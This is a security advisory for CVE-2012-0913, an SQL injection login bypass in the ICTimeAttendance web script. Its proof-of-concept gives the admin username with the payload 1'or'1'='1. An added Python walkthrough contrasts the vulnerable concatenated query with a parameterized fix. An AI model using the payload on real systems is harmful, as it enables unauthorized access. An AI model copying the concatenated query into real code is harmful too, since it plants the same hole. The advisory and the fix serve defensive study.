ICTimeAttendance SQL Injection Vulnerability

Published : 2012-01-20 (updated 2012-01-30)
Credit    : v3n0m
Risk      : Medium
CWE       : CWE-89
CVE       : CVE-2012-0913
Local     : No
Remote    : Yes

CVSS Base Score         : 7.5/10
Impact Subscore         : 6.4/10
Exploitability Subscore : 10/10
Exploit range           : Remote
Attack complexity       : Low
Authentication          : Not required
Confidentiality impact  : Partial
Integrity impact        : Partial
Availability impact     : Partial

-----------------------------------------------------------------------
ICTimeAttendance Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : January, 19-2012
Location : Jakarta, Indonesia
Time Zone : GMT +7:00

Application : ICTimeAttendance - Time attendance script
Price : $57.09
Vendor : http://www.icloudcenter.com/

Exploit & p0c
_____________

go to
http://domain.tld/[path]/index.html

then login with
Username : admin
Password : 1'or'1'='1
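The bypass above works because the login check builds its SQL query by pasting the submitted username and password straight into the string (CWE-89), so the quoted password value terminates the literal and appends an always-true OR clause. The following is an added example, not code from the advisory or from the vendor's product: it reconstructs a hypothetical login check in the vulnerable concatenated form beside the parameterized form that defeats it, using an in-memory SQLite table with constructed sample users (the table name, columns and passwords are assumptions for the demonstration).

```python
import sqlite3

# Constructed sample data for the demo. A real application must store
# password hashes, never plaintext; plaintext is used only to keep the
# comparison logic visible.
USERS = [("admin", "correct-horse-battery"), ("alice", "s3cret")]


def _connect() -> sqlite3.Connection:
    """Create an in-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_sql(username: str, password: str) -> str:
    """String-concatenated query: the CWE-89 pattern the advisory describes.
    The quote inside the password closes the literal early, so the rest of
    the value becomes SQL syntax rather than data."""
    return (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(username: str, password: str) -> bool:
    """Hypothetical vulnerable login: authenticates if any row matches."""
    conn = _connect()
    try:
        return conn.execute(build_vulnerable_sql(username, password)).fetchone()[0] > 0
    finally:
        conn.close()


def login_fixed(username: str, password: str) -> bool:
    """Parameterized query: the submitted values are bound as data, so a
    quote in the password is compared literally and cannot alter the query."""
    conn = _connect()
    try:
        row = conn.execute(
            "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
            (username, password),
        ).fetchone()
        return row[0] > 0
    finally:
        conn.close()


if __name__ == "__main__":
    payload = "1'or'1'='1"
    print(build_vulnerable_sql("admin", payload))
    print("vulnerable:", login_vulnerable("admin", payload))
    print("fixed:     ", login_fixed("admin", payload))
```

With the advisory's password value, the concatenated query becomes `... AND password = '1'or'1'='1'`; because AND binds tighter than OR, the WHERE clause is true for every row and the vulnerable check accepts the login, while the parameterized version compares the whole string as the password and rejects it. The remediation for the product is the same as in `login_fixed`: bind user input as parameters (or use an ORM that does), and additionally compare against stored password hashes rather than raw values.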

ShoutZ
______

All YOGYACARDERLINK CREW

References:

http://yogyacarderlink.web.id/
http://www.icloudcenter.com/
http://xforce.iss.net/xforce/xfdb/72569
http://www.securityfocus.com/bid/51589
http://www.exploit-db.com/exploits/18394
http://osvdb.org/78444
Copyright 2017, cxsecurity.com